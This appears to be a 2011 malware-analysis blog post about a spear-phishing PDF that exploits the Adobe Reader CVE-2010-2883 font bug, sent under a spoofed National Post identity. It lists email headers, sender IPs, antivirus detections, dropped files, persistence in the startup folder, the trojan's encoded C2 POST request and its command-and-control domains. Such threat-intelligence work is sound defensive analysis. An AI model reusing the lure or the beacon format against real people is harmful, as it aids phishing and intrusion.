Common Vulnerabilities and Exposures
CVE-2010-2883 Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010.
General File Information
MD5 8E633588B3EE59DE09FE126D99869D2D
SIZE 103981 bytes
EXPLOIT TYPE CVE-2010-2883
FILE NAME Bin Ladens successor.pdf
The file uses Fonts/SING CVE_2010-2883 exploit, which does not seem to be metasploit generated.
* Jan 12 CVE-2010-3654 + CVE-2009-4324 + CVE-2009-0927 + CVE-2008-0655 PDF JANUARY 2011 from a compromised Thai Police account
EXPLOIT TYPE CVE-2010-2883
FILE NAME Bin Ladens successor.pdf
Post Updates
The file uses Fonts/SING CVE_2010-2883 exploit, which does not seem to be metasploit generated.
The sender is often uses compromised servers of different organizations
* Jan 6 CVE-2010-3333 DOC with info theft trojan from the American Chamber of Commerce* Jan 12 CVE-2010-3654 + CVE-2009-4324 + CVE-2009-0927 + CVE-2008-0655 PDF JANUARY 2011 from a compromised Thai Police account
It is unclear whether this time it is a compromised server or the attacker uses the services of this internet provider as a customer
Beyond the Network America, Inc. (BTNaccess) is a wholly owned subsidiary of PCCW, and is headquartered in Reston, Virginia and Hong Kong with offices in Los Angeles, New York City, Philadelphia, Houston, London, Moscow, Prague, Kuala Lumpur, Singapore, Shenzhen, Tokyo, Mumbai and New Delhi.
PCCW, a global leader in next generation broadband solutions, is the largest telecommunications provider in Hong Kong. PCCW is the operator of one of the world’s most advanced broadband networks and has over 700,000 broadband customers and 12,500 employees worldwide. As a global player, PCCW has portrayed innovation within the industry and demonstrated financial stability with 2003 revenues reaching US$2.89 billion.
Download
Original Message
-----Original Message-----
From: Peter Goodspeed [mailto:gpeter@nationalpost.com]
Sent: Monday, May 16, 2011 10:02 PM
To: xxxxxxxxxxx
Subject: Bin Laden’s successor may launch new strike
Dear,
Wellcome to Subscribe our Journals.Please find attached the analysis
of "Bin Laden¡¯s successor may launch new strike".
Best regards,
National Post
Peter Goodspeed
1450 Don Mills Road, Suite 300
Don Mills, Ontario
Canada
M3B 3R5
From: Peter Goodspeed [mailto:gpeter@nationalpost.com]
Sent: Monday, May 16, 2011 10:02 PM
To: xxxxxxxxxxx
Subject: Bin Laden’s successor may launch new strike
Dear,
Wellcome to Subscribe our Journals.Please find attached the analysis
of "Bin Laden¡¯s successor may launch new strike".
Best regards,
National Post
Peter Goodspeed
1450 Don Mills Road, Suite 300
Don Mills, Ontario
Canada
M3B 3R5
___________________________
Message Headers
Received: (qmail 10512 invoked from network); 17 May 2011 02:00:58 -0000Received: from unknown (HELO nationalpost.com) (63.221.138.44)
by xxxxxxxxxx with SMTP; 17 May 2011 02:00:58 -0000
From: "Peter Goodspeed"
Subject: Bin =?GB2312?B?TGFkZW6hr3M=?= successor may launch new strike
To: xxxxxxxxxxxxxxxx
Content-Type: multipart/mixed;
boundary="=_NextPart_2rfkindysadvnqw3nerasdf"; charset="GB2312"
MIME-Version: 1.0
Reply-To: gpeter@nationalpost.com
Date: Tue, 17 May 2011 10:01:40 +0800
X-Priority: 3
X-Mailer: FoxMail 3.11 Release [cn]
_____________________________________
Sender IP
Beyond the Network America in Hong Kong
63.221.138.4
Host reachable, 252 ms. average
63.216.0.0 - 63.223.255.255
Beyond The Network America, Inc.
450 Springpark PL
Suite 100
Herdon
VA
20170
United States
Downes, Chris
+1-703-621-1619
cdownes@pccwglobal.com
PCCW US NOC
+1-703-621-1637
usnoc@pccwglobal.com
PCCW AUP Department
+1-703-621-1637
abuse.ops@pccwglobal.com
Hostname: 63.221.138.4
ISP: Beyond The Network America
Organization: Beyond The Network America
Proxy: None detected
Type: Corporate
Assignment: Static IP
Blacklist:
Geolocation Information
Country: Hong Kong
City: Hong Kong
Host reachable, 252 ms. average
63.216.0.0 - 63.223.255.255
Beyond The Network America, Inc.
450 Springpark PL
Suite 100
Herdon
VA
20170
United States
Downes, Chris
+1-703-621-1619
cdownes@pccwglobal.com
PCCW US NOC
+1-703-621-1637
usnoc@pccwglobal.com
PCCW AUP Department
+1-703-621-1637
abuse.ops@pccwglobal.com
Hostname: 63.221.138.4
ISP: Beyond The Network America
Organization: Beyond The Network America
Proxy: None detected
Type: Corporate
Assignment: Static IP
Blacklist:
Geolocation Information
Country: Hong Kong
City: Hong Kong
Nationalpost.com was spoofed, the real hosting location of this domain is in Canada
nationalpost.com
199.71.40.135
goto.canada.com
Info:
Postmedia Network Inc.
Peter deGroot
1450 Don Mills Rd.
Toronto, ON M3B 2X7
CAN
Phone: 1 905 3042195 ()
Fax..: 1 905 3042195
Email: Webnames@postmedia.com
199.71.40.135
goto.canada.com
Info:
Postmedia Network Inc.
Peter deGroot
1450 Don Mills Rd.
Toronto, ON M3B 2X7
CAN
Phone: 1 905 3042195 ()
Fax..: 1 905 3042195
Email: Webnames@postmedia.com
Automated Scans
File name: Bin Laden
http://www.virustotal.com/file-scan/report.html?id=d9493b6243a0378859610748590de21dc4df36c287197fde13c507d3895f8be6-1306841333
Submission date: 2011-05-31 11:28:53 (UTC)
Result: 16/ 42 (38.1%)
AntiVir 7.11.8.205 2011.05.31 EXP/CVE-2010-2883.F
Antiy-AVL 2.0.3.7 2011.05.31 Exploit/Win32.Pidief
Avast 4.8.1351.0 2011.05.31 JS:Pdfka-gen
Avast5 5.0.677.0 2011.05.31 JS:Pdfka-gen
ClamAV 0.97.0.0 2011.05.31 PUA.Script.PDF.EmbeddedJS
Commtouch 5.3.2.6 2011.05.31 PDF/Obfusc.J!Camelot
Comodo 8902 2011.05.31 UnclassifiedMalware
DrWeb 5.0.2.03300 2011.05.31 Exploit.PDF.2197
eTrust-Vet 36.1.8358 2011.05.31 PDF/Pidief!generic
F-Prot 4.6.2.117 2011.05.30 JS/ShellCode.DF.gen
Fortinet 4.2.257.0 2011.05.31 PDF/CoolType!exploit.CVE20102883
GData 22 2011.05.31 JS:Pdfka-gen
Ikarus T3.1.1.104.0 2011.05.31 Exploit.PDF
Microsoft 1.6903 2011.05.31 Exploit:Win32/CVE-2010-2883.A
Sophos 4.65.0 2011.05.31 Mal/PDFJs-Z
MD5 : 8e633588b3ee59de09fe126d99869d2d
Result: 16/ 42 (38.1%)
AntiVir 7.11.8.205 2011.05.31 EXP/CVE-2010-2883.F
Antiy-AVL 2.0.3.7 2011.05.31 Exploit/Win32.Pidief
Avast 4.8.1351.0 2011.05.31 JS:Pdfka-gen
Avast5 5.0.677.0 2011.05.31 JS:Pdfka-gen
ClamAV 0.97.0.0 2011.05.31 PUA.Script.PDF.EmbeddedJS
Commtouch 5.3.2.6 2011.05.31 PDF/Obfusc.J!Camelot
Comodo 8902 2011.05.31 UnclassifiedMalware
DrWeb 5.0.2.03300 2011.05.31 Exploit.PDF.2197
eTrust-Vet 36.1.8358 2011.05.31 PDF/Pidief!generic
F-Prot 4.6.2.117 2011.05.30 JS/ShellCode.DF.gen
Fortinet 4.2.257.0 2011.05.31 PDF/CoolType!exploit.CVE20102883
GData 22 2011.05.31 JS:Pdfka-gen
Ikarus T3.1.1.104.0 2011.05.31 Exploit.PDF
Microsoft 1.6903 2011.05.31 Exploit:Win32/CVE-2010-2883.A
Sophos 4.65.0 2011.05.31 Mal/PDFJs-Z
MD5 : 8e633588b3ee59de09fe126d99869d2d
Created files and traffic
the payload is the same type of trojan described
Created files
C:\Documents and Settings\mila\Local Settings\Application Data\Windows\userinit.dll MD5: 5D4877E3603149372CA210A8D2B60492
C:\Documents and Settings\mila\Local Settings\Application Data\Windows\userinit.exe MD5: 4353E469D8B4A7BAE876C81D3CAAA0D1
C:\Documents and Settings\mila\Start Menu\Programs\Startup\userinit.exe MD5: 4353E469D8B4A7BAE876C81D3CAAA0D1
C:\Documents and Settings\All Users\Application Data\desktop.BIN `` MD5: 4353E469D8B4A7BAE876C81D3CAAA0D1
C:\Documents and Settings\mila\Local Settings\Application Data\Windows\userinit.dll MD5: 5D4877E3603149372CA210A8D2B60492
C:\Documents and Settings\mila\Local Settings\Application Data\Windows\userinit.exe MD5: 4353E469D8B4A7BAE876C81D3CAAA0D1
C:\Documents and Settings\mila\Start Menu\Programs\Startup\userinit.exe MD5: 4353E469D8B4A7BAE876C81D3CAAA0D1
C:\Documents and Settings\All Users\Application Data\desktop.BIN `` MD5: 4353E469D8B4A7BAE876C81D3CAAA0D1
The traffic is also analyzed in the mentioned post
# The persistence is achieved via relaunching the binary from the infected user startup folder (Start Menu\Programs\Startup\userinit.exe), also the there is a copy of the file gets created as All Users\Application Data\desktop.BIN
# Userinit.exe creates folder logs in %userprofile%\Local Settings\Application Data\Windows\Logs. A shortcut like in the image below shows up in that directory for a split second but I did not capture it. This is the file that gets transmitted with HTTP POST, MDAwMGhIRUwuMDk in meta part of the URL string can be decoded as meta=0000hHEL.09
**POST /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADI ALgAxADYAOAAuADIALgAyAA%3D%3D%26meta%3DMDAwMGhIRUwuMDk%3D%26id%3 Dlfdxfircvscxggb HTTP/1.1.
The last part -lfdxfircvscxggb - is changing with each GET request and is possibly an encoded directories names on the victim pc
C2 information
DNS queries and traffic to
www.offlinewebpage.com
58.68.224.22
58.68.224.22 HTTP POST /qduxwfnfozvsrtkjprepggxrpnrvyst.htm HTTP/1.1
Reverse IP Lookup Results—3 domains hosted on IP address 58.68.224.22
Web Site
live-facebook.com
live-msn.net
offlinewebpage.com
Domain name: OFFLINEWEBPAGE.COM
Updated Date: 2010-10-05
Creation Date: 2010-10-05
Expiration Date: 2012-10-05
Registrant:
david Boulevard
No.17 Ren Rd. zonn District, fifa, akai 116001
bb aa 116001
Phone: +86.075184562547 Fax: +86.075184562547
Administrative Contact:
david Boulevard new delphi qingwa20112011@163.com
No.17 Ren Rd. zonn District, fifa, akai 116001
Registrar of Record: NAME2HOST, INC.
Domain servers in listed order:
DNS1.51.NET 118.144.82.171
DNS2.51.NET 118.145.1.7
IP Address History
Event Date Action Pre-Action IP Post-Action IP
2010-10-06 New -none- 127.0.0.1
2011-03-18 Change 127.0.0.1 58.68.224.22
2011-04-10 New -none- 58.68.224.22
Traffic to
msn.offlinewebpage.com
114.248.80.32
inetnum: 114.240.0.0 - 114.255.255.255
Hostname: 114.248.80.32
ISP: China Unicom Beijing Province Network
Organization: China Unicom Beijing Province Network
Proxy: None detected
Type: Broadband
Assignment: Static IP
Country: China
State/Region: Beijing
City: Beijing
No comments:
Post a Comment